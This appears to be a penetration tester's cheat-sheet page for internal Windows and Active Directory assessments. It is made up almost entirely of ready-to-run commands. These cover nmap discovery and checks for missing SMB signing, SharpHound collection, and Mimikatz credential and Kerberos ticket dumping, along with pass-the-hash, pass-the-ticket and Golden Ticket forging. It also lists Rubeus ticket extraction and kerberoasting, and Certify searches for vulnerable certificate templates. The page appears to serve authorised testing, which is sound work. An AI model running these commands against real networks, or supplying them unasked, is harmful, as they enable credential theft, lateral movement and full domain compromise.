Internal (Windows)
Starting with some NMap Scans/Scripts we can find plenty of other information for more targeted attacks and finding other attack paths/vectors. Then depending if we were given user credentials to perform a "compromised user" approach, we can go down other paths, but either way we would want to check for all of these with and without credentials.
We should verify if the machine is domain joined or not as well.
NMap
Find Uphosts:
nmap -sn -iL targets.txt -oG - | ForEach-Object { if ($_ -match "Up$") { ($_ -split ' ')[1] } } > up-hosts.txt
Scan and output to file:
nmap -p 80 --open -iL targets.txt > 80.txt
SMB Signing Not Required:
nmap -p 445 -iL uphosts.txt --script smb2-security-mode.nse > smb-signing-not-required.txt
SNMP Info
nmap -Pn -sV -p 161 --script=snmp-info IP
Puts saved output into a list of IPs:
Select-String -Path "input.txt" -Pattern '\b(?:\d{1,3}\.){3}\d{1,3}\b' | ForEach-Object { $_.Matches.Value } > output.txt
Sharphound
Ingest Files for bloodhound
Sharphound.exe -u USER -p 'PASSWORD' -d DOMAIN -c All
Mimikatz
Enable debug privileges
privilege::debug
sekurlsa
Extract credentials from the system's memory
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
Dump and export Kerberos tickets from memory
sekurlsa::tickets /export
Pass the hash - PTH
sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:cmd
kerberos
Dump and export Kerberos tickets from memory associated with active user sessions
kerberos::list /export
Pass the ticket - PTT
kerberos::ptt c:\TICKET
Create a Golden Ticket
kerberos::golden /admin:DOMAIN-ADMIN /domain:DOMAIN /sid:USER-SID /krbtgt:KRBTGT /ticket:TICKET
TGT
Interact with and manipulate Kerberos tickets
kerberos
ekeys
Dump encryption keys from the system's memory
sekurlsa::ekeys
DPAPI
Extract and decrypt credentials protected by DPAPI (Data Protection API) from memory
sekurlsa::dpapi
Rubeus
Verify we can obtain a valid Kerberos ticket
.\Rubeus.exe asktgt /user:USER /password:PASSWORD
Dump all Kerberos tickets currently in memory for the logged-in user
.\Rubeus.exe dump
Export file tickets to .kirbi file
.\Rubeus.exe dump /export
Requests a service ticket (TGS) for a specific service using an existing TGT.
.\Rubeus.exe asktgs /ticket:BASE-64-TICKET
Request service tickets for SPNs (Service Principal Names) associated with service accounts
.\Rubeus.exe kerberoast
klist
Certify
Find all enabled certificate templates
.\Certify.exe find
Find vulnerable/abusable certificate templates
.\Certify.exe find /vulnerable
Last updated